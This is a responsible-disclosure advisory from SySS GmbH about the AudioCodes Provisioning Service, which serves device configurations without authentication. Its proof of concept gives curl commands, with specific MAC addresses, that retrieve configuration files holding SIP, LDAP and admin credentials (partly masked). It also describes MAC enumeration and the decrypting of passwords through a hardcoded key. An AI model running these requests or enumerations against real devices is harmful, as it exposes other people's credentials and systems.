-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2022-053 Product: AudioCodes Provisioning Service Manufacturer: AudioCodes Ltd. Affected Version(s): N.A. Tested Version(s): N.A. Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Risk Level: High Solution Status: Fixed; manual actions are required Manufacturer Notification: 2022-11-11 Solution Date: 2023-07-12 Public Disclosure: 2023-08-10 CVE Reference: Not yet assigned Author of Advisory: Moritz Abrell, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: The AudioCodes Provisioning Service is a web service hosted by AudioCodes. Its main purpose is the automatic provisioning ("zero touch deployment") of AudioCodes devices, e.g. VoIP phones. The manufacturer describes the product as follows (see [1]): "AudioCodes Redirect Service offers an efficient and reliable method for service providers, distributors, resellers and end customers to enable mass auto-provisioning of AudioCodes devices. It achieves this by redirecting generic devices to a dedicated provisioning server when they are first booted up, eliminating the need to pre-configure devices before deployment." ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: When starting an AudioCodes device in default factory settings, the device requests the AudioCodes Provisioning Service (reachable at the URL https://redirect.audiocodes.com) with its MAC address for a configuration file or a new provisioning URL. Due to the lack of authentication, an attacker is able to request these configurations and extract sensitive information such as device, SIP, and LDAP credentials. Since the configurations are assigned based on the requested MAC address, it is also possible to enumerate all AudioCodes MAC addresses and thus all existing configurations and provisioning redirections. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): Example 1: Requesting and accessing a device-specific configuration file: 1. #> curl -v https://redirect.audiocodes.com/00908FC50000 2. The AudioCodes Provisioning Service responds with a redirect respectively with an HTTP Location header: HTTP/1.1 302 Found Location: http://redirect.audiocodes.com/pub/MP202-DMS-Flash-USA.CONF 3. By following the redirection, the device configuration is accessible: #> curl -L https://redirect.audiocodes.com/00908FC50000 [...] (password(############)) [...] Example 2: Requesting and accessing a device-specific configuration file with a redirect to the AudioCodes "One Voice Operation Center": 1. #> curl -v https://redirect.audiocodes.com/00908F9D896A 2. The redirection indicates the use of the AudioCodes "One Voice Operation Center": HTTP/1.1 302 Found Location: https://ippdm.audiocodes.com/ipp/;dhcpoption160.cfg 3. Requesting and accessing the device configuration from the "One Voice Operation Center": #> curl https://ippdm.audiocodes.com/configfiles/00908F9D896A.cfg [...] ems_server/user_name=############@audiocodes.com ems_server/user_password={"yo7pj3############"} ;NO USER ############@audiocodes.com configuration [...] 4. The password value in this example is encrypted. However, due the use of a hardcoded cryptographic key (CWE-321), this encrypted password can be decrypted. See SYSS-2022-052 for more information about this security issue. Example 3: Requesting and accessing a device-specific configuration file with a redirect to another service provider: 1. #> curl -v https://redirect.audiocodes.com/00908F9DB311 2. Redirect to a service provider including a 32-byte UID: HTTP/1.1 302 Found Location: https://phones-na.#####.##/1f417#######[...]/ 3. Requesting and accessing the device configuration: #> curl -v https://phones-na.#####.##/1f417#######[...]/00908F9DB311.cfg [...] voip/line/0/auth_name=u36############ voip/line/0/auth_password=5h!############ system/password=57############ system/web_user_password=57############ [...] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Customers have to manually enable mTLS in the Redirect Service. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2022-11-03: Vulnerability discovered 2022-11-11: Vulnerability reported to manufacturer 2022-12-12: Vulnerability confirmed by AudioCodes Ltd. 2023-01-10: AudioCodes Ltd. informs that a certificate-based authentication is planned and that it will be implemented 2023-03-29: AudioCodes Ltd. delays the planned certificate-based authentication due to backward compatibility issues 2023-07-12: AudioCodes Ltd. releases a certificate-based authentication which must be manually enabled by customers 2023-07-12: A product notice about the solution is provided by AudioCodes Ltd.[5] 2023-07-13: It is recommended to enforce and enable mTLS by default 2023-07-14: AudioCodes Ltd. informs that this will be discussed internally 2023-08-10: Public disclosure at BlackHat USA[6] 2023-08-11: Public disclosure at https://blog.syss.com[7] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] AudioCodes Redirect Service Datasheet https://www.audiocodes.com/media/15664/audiocodes-redirect-service.pdf [2] AudioCodes One Voice Operation Center User's Manual https://www.audiocodes.com/media/15928/one-voice-operations-center-users-manual-ver-80.pdf [3] SySS Security Advisory SYSS-2022-053 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-053.txt [4] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy [5] AudioCodes Ltd. mTLS Product Notice https://www.audiocodes.com/media/cuzmopqx/0503-product-notice-mutual-tls-authentication-for-audiocodes-redirect-service.pdf [6] BlackHat USA Briefings Session https://www.blackhat.com/us-23/briefings/schedule/#zero-touch-pwn-abusing-zooms-zero-touch-provisioning-for-remote-attacks-on-desk-phones-31341 [7] Detailed Blog Post https://blog.syss.com/posts/zero-touch-pwn/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Moritz Abrell of SySS GmbH. E-Mail: moritz.abrell@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmS30VwACgkQrgyb+PE0 i1Ottw//SetTEgck9k1PAY27+F5DvzwO8xDSW16JtLyoyOjI0IwxmGe8Z99CyJtQ GQUhmAmYdytfpnUOiUrDxjKQXA+AUnT4qFXfbpFcH9jhS8OfmhHn0ioa3291RnAK zH81ONC9IHIH4Q1AMyDbhL9tXuHvm30q51Oa74rM3fb9j19SqCc7/LjfgIbtba/H gKdU8eg743UnCbKwnBQUVGlaHGsVuRKeMCHUHmDAhu7CSrmDWmHd/5Z2im2QZeuj SFiDPspPj32iAzTRUtsMUR/N7iO6r9E54GRqcnreYufmwjg1ynW/hEImGLj/V0PE vIRacukIv+sNJD0hlnc4RHB0GdBH7KmIYvp2XW3sojtMATgoVzqCT7Ny+gVRt2H7 UGF2J6N0NbCZh9+T/qBA8VTkio3sKEO6MQSaAselKKYPr+Je+nN5hblTuDwS6oDV 5h6cEuOlIhWlaNVuYghVyMWDH+vc1kuujgIWy+nnQvCjQZaBSKRoJrxR4fBjFynH dl/xUTUy5Dta4e6VYoNXdArVl94EvNnDDGhFTd3gY3flfqxxqfbdlEHDPY437s6C PSE1LYhcB+yBqT54+xZITzwRm4xOwEyjBRGtycJdI8guA+dW8w48noIhbxo7DrMw YDsiapNgHOSewc9HBrlbcyDJp8sDjFgnRsMeU+VuniEfNBDTVHQ= =EnqY -----END PGP SIGNATURE-----